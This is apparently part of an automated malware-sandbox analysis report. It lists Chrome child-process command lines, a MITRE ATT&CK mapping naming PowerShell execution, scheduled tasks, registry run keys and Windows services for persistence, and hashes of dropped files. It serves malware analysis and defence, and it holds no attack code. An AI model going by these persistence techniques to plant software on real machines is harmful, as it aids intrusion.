C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2280 --field-trial-handle=1992,i,10873951759385171277,7885255491642300329,131072 /prefetch:82⤵PID:3140
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3144 --field-trial-handle=1992,i,10873951759385171277,7885255491642300329,131072 /prefetch:12⤵PID:3348
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3176 --field-trial-handle=1992,i,10873951759385171277,7885255491642300329,131072 /prefetch:12⤵PID:1584
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4404 --field-trial-handle=1992,i,10873951759385171277,7885255491642300329,131072 /prefetch:12⤵PID:3312
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4704 --field-trial-handle=1992,i,10873951759385171277,7885255491642300329,131072 /prefetch:82⤵PID:4004
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4836 --field-trial-handle=1992,i,10873951759385171277,7885255491642300329,131072 /prefetch:82⤵PID:4668
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=5084 --field-trial-handle=1992,i,10873951759385171277,7885255491642300329,131072 /prefetch:12⤵PID:244
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=4844 --field-trial-handle=1992,i,10873951759385171277,7885255491642300329,131072 /prefetch:12⤵PID:364
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=3188 --field-trial-handle=1992,i,10873951759385171277,7885255491642300329,131072 /prefetch:12⤵PID:4540
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=2752 --field-trial-handle=1992,i,10873951759385171277,7885255491642300329,131072 /prefetch:12⤵PID:3444
-
-
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"1⤵PID:3460
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
Filesize
6KB
MD59e415fb92af655729108cac5449c9528
SHA1d8db8cd1dba607744e0c0ec7050ed3ee5efd19d5
SHA2561c3c5e0350a1b4b455ca91a0c5846a2342462450e1e26d24b39d9f4264f27657
SHA512da9ab715f57709d1cdf2afbf28ebdc1de336492315ae1f0ac27154cc28aeb5ba690e0ac6ba4b9829b31528884d7b30630bdef237d03040bacae82a473f4f46c3
-
Filesize
144KB
MD539f1bcf071044a9f518f1caa9524689f
SHA16c0fac890189ebbc101fe25b69d3d1262a087ad6
SHA2566924d6787a0b4988af8fffecc0edca0fbf9ff32fa00267aec58b0f19a040e621
SHA512d56e0622c4090dc2ed2c84f623755b0488be00a02d8bc08f170ba504a503e8d3c0c76e1c2c45adc2b2cfddc2124f3bdc4e917d5f3b7719a9322ad0f2ac310f19
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD504a8ee401059de47c407218992b49f05
SHA15db67f41bbbfcd61787b3df4a637f1c2c99145fb
SHA256c95e6dd6efa0a7d972c50898d9e6709ff532f35d656d3b720a9bd2bfa063d41d
SHA512167ab30fcf45c7de4ab6c56f3d19746ed94552ec53c45995ba085822c9522c1d1bc59e9382e44c9c0e0a97bcaafb9913b44350186c32d74a456f57c016bbf829
-
Filesize
944B
MD5db9c5308f6767121fa1fa7f7c31e6589
SHA1f26b22a0ed448b85f741a46c6812b42f29ba1ec3
SHA2562560795c0b8d4ff54d5611c0730803b4d840753feb815804d92aee572109e25e
SHA512d97b58760ed3d3a56930eaaf7b665016323767742af65413f42148cd1e718238d20af3ec5c44c7605dfb67d463d2726f1493fb6e18a5df637f10a7f434394cc0
-
Filesize
948B
MD5b58b9004cf53639da7926daf4c4527a2
SHA188383758daf892f9e26fee71b6fdff4f88aa218b
SHA25630497f77129983371c74078b22b487645b230f113d1f099186afff3fb8cc97d4
SHA5125ca26a1452c3e719247622a06ffb71f8d48a61a2dc00a675576010a375c9a7246c8cf437904f027d3679561a426f8dc0524d5212e58904e6ca38cd51d1ffd6ec
-
Filesize
948B
MD5c216c7f1b14d6fdb4ac1843356edf3c4
SHA10d59b722be2ef39f8ee070d1ed16c98826d0867a
SHA256161c9a69ade0c53000a5c9972ce424061ec9d2becae1062f1f912fb7e313e5f6
SHA51242d1337664aac02d5c1ebfeee3e721672ad5c2620da8e424e2c54eea04ca634117f8916af09801c91a3ee3c4b701539ff118f1cd35f434a63722e83e5059c1ea
-
Filesize
944B
MD56c47b3f4e68eebd47e9332eebfd2dd4e
SHA167f0b143336d7db7b281ed3de5e877fa87261834
SHA2568c48b1f2338e5b24094821f41121d2221f1cb3200338f46df49f64d1c4bc3e0c
SHA5120acf302a9fc971ef9df65ed42c47ea17828e54dff685f4434f360556fd27cdc26a75069f00dcdc14ba174893c6fd7a2cfd8c6c07be3ce35dafee0a006914eaca
-
Filesize
3KB
MD53557fd8df9f2eea025db00b6037057c2
SHA16c01403cfb5386f41d8ee223c267eb3e6f2f9b83
SHA2567d97b0e1010946dd695028f47ffaccb47bce0fac5bb7dce3644865bb0fb71f16
SHA512da78ae660a548c62d72e29442d5af4d48f36a7a16181eb6bef67a955a40a58e7fcb79d83aea35445a809b0f204164320b0a48a23b6342c2c1b0d698363b0d6bf
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
1KB
MD5ed3053ed60029bce7a0f9346dd78af27
SHA1e71a66591d17ba57786302055e546bd864fb918b
SHA2565a7448b5c48843d6112ecca9e7d92f13e6f887a1674dc107144cb0188523b380
SHA512104e67817b32d185e88918e29694daaf474866bd1b9ad64421ae70a73371c89b2deee3aa02d0cbf5ab654ca0a267b6d109ffac88bca0d97536a1e283b04591a5
-
Filesize
1KB
MD52271642ca970891700e3f48439739ed8
SHA1cd472df2349f7db9e1e460d0ee28acd97b8a8793
SHA2567aba66abbcb0b13455609174db23aed495a9adbef0e0acd28baa9c92445eda68
SHA5124669a4ef8ec28cdb852ffc1401576b1bf9a9d837797d7d92bc88c18b3097404f36854e50167b309706fef400cabc43c876569ce2797ba85eb169a2783b8fe807
-
Filesize
92KB
MD5b5dc91de17a295dff74f04775cb4b0f6
SHA104b4174239e0640926e0e4baa19e3bde697e3c17
SHA256751de7168c8a1da0803db0a0c13abb2f9f0d40d2989ca31967f329b2a4f635bc
SHA51270c4f9e0630652369fdf4a79f459d271e1dc8a3efe6560970b1092c6e394a725a6045d8010e0cd5ced345eaa5e56f33f3c8365474bd0a3209ce3778a8db20331
-
Filesize
1KB
MD514ea261d44218a9791555b72a7767c29
SHA14bce49b19c36e59da55d95bed268450ae99f01a3
SHA2564ead5762a374a921de330d5f2fd3ad4aaf015bc7d004d34c97740f5804085cb4
SHA5122eae9a9e13c4137e864e75c2f22cb2761a86d6282d6f28bd06f11032a664c140d1055067ff73056d3dc0469fc44e4bbe3dc922317f0ff6d4f08551a719bf1d60
-
Filesize
499KB
MD52304b7950394e771b89b4dde4dcccff9
SHA1e9cdb5b9b5afe2125c2086293ae20fd11129edc1
SHA2569cdf6b9e97cb1168697b7cb4c0ae472c7d26cf867c3ba44b3c6a33fa1e6a7b43
SHA51216bb035c8935370c876703b404712112ff68743853c3dd74f4420423f4547340b3d29f606ffc343d21ca8a47859080c3e884bc8c49c54d9b8d5f9feca996eef0
-
Filesize
203KB
MD523296053d543c5fce94532c2717c8710
SHA150edfa61b97bb2454e91d88f6c48d2b0d591d95e
SHA2560974a318654b48f0c01caec006a8acee83243fc1b585da6c68fa24d0eb71aeaa
SHA51236396a0aa8551a06c73cdbc661d7e5d8fe238e2f095f51657dbcf6d05ecd47e80715a863942b8c600109719640e787e797289ee0cdcfa9e20cb6cdb3f354fa81